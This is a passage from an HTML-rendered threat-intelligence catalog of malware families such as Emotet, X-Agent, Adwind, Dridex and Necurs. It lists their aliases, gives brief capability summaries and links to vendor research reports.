<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html">https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_emotet"><a class="anchor" href="#_emotet"></a><a class="link" href="#_emotet">Emotet</a></h3>
<div class="paragraph">
<p>Emotet is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Geodo</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2590. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/">https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hoardy"><a class="anchor" href="#_hoardy"></a><a class="link" href="#_hoardy">Hoardy</a></h3>
<div class="paragraph">
<p>Hoardy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hoarde</p>
</li>
<li>
<p>Phindolp</p>
</li>
<li>
<p>BS2005</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2591. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/nccgroup/Royal_APT">https://github.com/nccgroup/Royal_APT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_htran_2"><a class="anchor" href="#_htran_2"></a><a class="link" href="#_htran_2">Htran</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2592. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/research/threats/htran/">http://www.secureworks.com/research/threats/htran/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_httpbrowser_2"><a class="anchor" href="#_httpbrowser_2"></a><a class="link" href="#_httpbrowser_2">HTTPBrowser</a></h3>
<div class="paragraph">
<p>HTTPBrowser is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TokenControl</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2593. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop">https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disgufa"><a class="anchor" href="#_disgufa"></a><a class="link" href="#_disgufa">Disgufa</a></h3>
</div>
<div class="sect2">
<h3 id="_elirks"><a class="anchor" href="#_elirks"></a><a class="link" href="#_elirks">Elirks</a></h3>
</div>
<div class="sect2">
<h3 id="_snifula"><a class="anchor" href="#_snifula"></a><a class="link" href="#_snifula">Snifula</a></h3>
<div class="paragraph">
<p>Snifula is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ursnif</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2594. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.circl.lu/pub/tr-13/">https://www.circl.lu/pub/tr-13/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aumlib"><a class="anchor" href="#_aumlib"></a><a class="link" href="#_aumlib">Aumlib</a></h3>
<div class="paragraph">
<p>Aumlib is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Yayih</p>
</li>
<li>
<p>mswab</p>
</li>
<li>
<p>Graftor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2595. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cybersquared.com/killing-with-a-borrowed-knife-chaining-core-cloud-service-profile-infrastructure-for-cyber-attacks">http://www.cybersquared.com/killing-with-a-borrowed-knife-chaining-core-cloud-service-profile-infrastructure-for-cyber-attacks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ctrat"><a class="anchor" href="#_ctrat"></a><a class="link" href="#_ctrat">CTRat</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2596. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fireeye.com/blog/technical/threat-intelligence/2014/07/spy-of-the-tiger.html">http://www.fireeye.com/blog/technical/threat-intelligence/2014/07/spy-of-the-tiger.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_emdivi"><a class="anchor" href="#_emdivi"></a><a class="link" href="#_emdivi">Emdivi</a></h3>
<div class="paragraph">
<p>Emdivi is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Newsripper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2597. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/operation-cloudyomega-ichitaro-zero-day-and-ongoing-cyberespionage-campaign-targeting-japan">http://www.symantec.com/connect/blogs/operation-cloudyomega-ichitaro-zero-day-and-ongoing-cyberespionage-campaign-targeting-japan</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_etumbot"><a class="anchor" href="#_etumbot"></a><a class="link" href="#_etumbot">Etumbot</a></h3>
<div class="paragraph">
<p>Etumbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Exploz</p>
</li>
<li>
<p>Specfix</p>
</li>
<li>
<p>RIPTIDE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2598. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">www.arbornetworks.com/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf[www.arbornetworks.com/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fexel"><a class="anchor" href="#_fexel"></a><a class="link" href="#_fexel">Fexel</a></h3>
<div class="paragraph">
<p>Fexel is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Loneagent</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_fysbis"><a class="anchor" href="#_fysbis"></a><a class="link" href="#_fysbis">Fysbis</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2599. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/">http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hikit_2"><a class="anchor" href="#_hikit_2"></a><a class="link" href="#_hikit_2">Hikit</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2600. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.bit9.com/2013/02/25/bit9-security-incident-update/">https://blog.bit9.com/2013/02/25/bit9-security-incident-update/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hancitor"><a class="anchor" href="#_hancitor"></a><a class="link" href="#_hancitor">Hancitor</a></h3>
<div class="paragraph">
<p>Hancitor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tordal</p>
</li>
<li>
<p>Chanitor</p>
</li>
<li>
<p>Pony</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2601. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear">https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ruckguv"><a class="anchor" href="#_ruckguv"></a><a class="link" href="#_ruckguv">Ruckguv</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2602. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear">https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_herher_trojan"><a class="anchor" href="#_herher_trojan"></a><a class="link" href="#_herher_trojan">HerHer Trojan</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2603. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_helminth_backdoor"><a class="anchor" href="#_helminth_backdoor"></a><a class="link" href="#_helminth_backdoor">Helminth backdoor</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2604. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hdroot"><a class="anchor" href="#_hdroot"></a><a class="link" href="#_hdroot">HDRoot</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2605. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://williamshowalter.com/a-universal-windows-bootkit/">http://williamshowalter.com/a-universal-windows-bootkit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_irongate"><a class="anchor" href="#_irongate"></a><a class="link" href="#_irongate">IRONGATE</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2606. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html">https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shimrat"><a class="anchor" href="#_shimrat"></a><a class="link" href="#_shimrat">ShimRAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2607. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf">https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_x_agent"><a class="anchor" href="#_x_agent"></a><a class="link" href="#_x_agent">X-Agent</a></h3>
<div class="paragraph">
<p>APT28&#8217;s second-stage persistent macOS backdoor. This backdoor component is known to have a modular structure featuring various espionage functionalities, such as key-logging, screen grabbing and file exfiltration. This component is available for Osx, Windows, Linux and iOS operating systems.</p>
</div>
<div class="paragraph">
<p>Xagent is a modular backdoor with spying functionalities such as keystroke logging and file exfiltration. Xagent is the groups flagship backdoor and heavily used in their operations. Early versions for Linux and Windows were seen years ago, then in 2015 an iOS version came out. One year later, an Android version was discovered and finally, in the beginning of 2017, an Xagent sample for OS X was described.</p>
</div>
<div class="paragraph">
<p>X-Agent is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XAgent</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2608. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/">http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://app.box.com/s/l7n781ig6n8wlf1aff5hgwbh4qoi5jqq">https://app.box.com/s/l7n781ig6n8wlf1aff5hgwbh4qoi5jqq</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/">https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#XAgent">https://objective-see.com/blog/blog_0x25.html#XAgent</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_x_tunnel"><a class="anchor" href="#_x_tunnel"></a><a class="link" href="#_x_tunnel">X-Tunnel</a></h3>
<div class="paragraph">
<p>X-Tunnel is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XTunnel</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_foozer"><a class="anchor" href="#_foozer"></a><a class="link" href="#_foozer">Foozer</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2609. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winids"><a class="anchor" href="#_winids"></a><a class="link" href="#_winids">WinIDS</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2610. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downrange"><a class="anchor" href="#_downrange"></a><a class="link" href="#_downrange">DownRange</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2611. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mad_max"><a class="anchor" href="#_mad_max"></a><a class="link" href="#_mad_max">Mad Max</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2612. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/mad-max-dga/">https://www.arbornetworks.com/blog/asert/mad-max-dga/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crimson_3"><a class="anchor" href="#_crimson_3"></a><a class="link" href="#_crimson_3">Crimson</a></h3>
<div class="paragraph">
<p>Crimson is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2613. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf">https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_prikormka_2"><a class="anchor" href="#_prikormka_2"></a><a class="link" href="#_prikormka_2">Prikormka</a></h3>
<div class="paragraph">
<p>Operation Groundbait based on our research into the Prikormka malware family. This includes detailed technical analysis of the Prikormka malware family and its spreading mechanisms, and a description of the most noteworthy attack campaigns.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2614. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nanhaishu"><a class="anchor" href="#_nanhaishu"></a><a class="link" href="#_nanhaishu">NanHaiShu</a></h3>
<div class="paragraph">
<p>This whitepaper details a malicious program we identify as NanHaiShu. Based on our analysis, the threat actor behind this malware targets government and private-sector organizations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2615. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_umbreon"><a class="anchor" href="#_umbreon"></a><a class="link" href="#_umbreon">Umbreon</a></h3>
<div class="paragraph">
<p>Umbreon (sharing the same name as the Pokémon) targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2616. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/">http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_odinaff"><a class="anchor" href="#_odinaff"></a><a class="link" href="#_odinaff">Odinaff</a></h3>
<div class="paragraph">
<p>Odinaff is typically deployed in the first stage of an attack, to gain a foothold onto the network, providing a persistent presence and the ability to install additional tools onto the target network. These additional tools bear the hallmarks of a sophisticated attacker which has plagued the financial industry since at least 2013Carbanak. This new wave of attacks has also used some infrastructure that has previously been used in Carbanak campaigns.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2617. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks">https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hworm"><a class="anchor" href="#_hworm"></a><a class="link" href="#_hworm">Hworm</a></h3>
<div class="paragraph">
<p>Unit 42 has observed a new version of Hworm (or Houdini) being used within multiple attacks. This blog outlines technical details of this new Hworm version and documents an attack campaign making use of the backdoor. Of the samples used in this attack, the first we observed were June 2016, while as-of publication we were still seeing attacks as recently as mid-October, suggesting that this is likely an active, ongoing campaign.</p>
</div>
<div class="paragraph">
<p>Hworm is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Houdini</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2618. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/">http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backdoor_dripion"><a class="anchor" href="#_backdoor_dripion"></a><a class="link" href="#_backdoor_dripion">Backdoor.Dripion</a></h3>
<div class="paragraph">
<p>Backdoor.Dripion was custom developed, deployed in a highly targeted fashion, and used command and control servers disguised as antivirus company websites.</p>
</div>
<div class="paragraph">
<p>Backdoor.Dripion is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dripion</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2619. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan">http://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adwind_2"><a class="anchor" href="#_adwind_2"></a><a class="link" href="#_adwind_2">Adwind</a></h3>
<div class="paragraph">
<p>Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. A significant amount of additional functionality can be provided through downloadable plugins, including such things as remote control options and shell command execution.</p>
</div>
<div class="paragraph">
<p>Adwind is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AlienSpy</p>
</li>
<li>
<p>Frutas</p>
</li>
<li>
<p>Unrecom</p>
</li>
<li>
<p>Sockrat</p>
</li>
<li>
<p>JSocket</p>
</li>
<li>
<p>jRat</p>
</li>
<li>
<p>Backdoor:Java/Adwind</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2620. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/73660/adwind-faq/">https://securelist.com/blog/research/73660/adwind-faq/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bedep"><a class="anchor" href="#_bedep"></a><a class="link" href="#_bedep">Bedep</a></h3>
</div>
<div class="sect2">
<h3 id="_cromptui"><a class="anchor" href="#_cromptui"></a><a class="link" href="#_cromptui">Cromptui</a></h3>
</div>
<div class="sect2">
<h3 id="_dridex_2"><a class="anchor" href="#_dridex_2"></a><a class="link" href="#_dridex_2">Dridex</a></h3>
<div class="paragraph">
<p>Dridex is a strain of banking malware that leverages macros in Microsoft Office to infect systems. Once a computer has been infected, Dridex attackers can steal banking credentials and other personal information on the system to gain access to the financial records of a user.</p>
</div>
<div class="paragraph">
<p>Dridex is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cridex</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2621. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fareit"><a class="anchor" href="#_fareit"></a><a class="link" href="#_fareit">Fareit</a></h3>
</div>
<div class="sect2">
<h3 id="_gafgyt"><a class="anchor" href="#_gafgyt"></a><a class="link" href="#_gafgyt">Gafgyt</a></h3>
</div>
<div class="sect2">
<h3 id="_gamarue"><a class="anchor" href="#_gamarue"></a><a class="link" href="#_gamarue">Gamarue</a></h3>
<div class="paragraph">
<p>Gamarue is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Andromeda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2622. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.gdatasoftware.com/2015/03/24274-the-andromeda-gamarue-botnet-is-on-the-rise-again">https://blog.gdatasoftware.com/2015/03/24274-the-andromeda-gamarue-botnet-is-on-the-rise-again</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_necurs"><a class="anchor" href="#_necurs"></a><a class="link" href="#_necurs">Necurs</a></h3>
<div class="paragraph">
<p>The Necurs botnet is a distributor of many pieces of malware, most notably Locky.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2623. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Necurs_botnet">https://en.wikipedia.org/wiki/Necurs_botnet</a></p></td>
</tr>
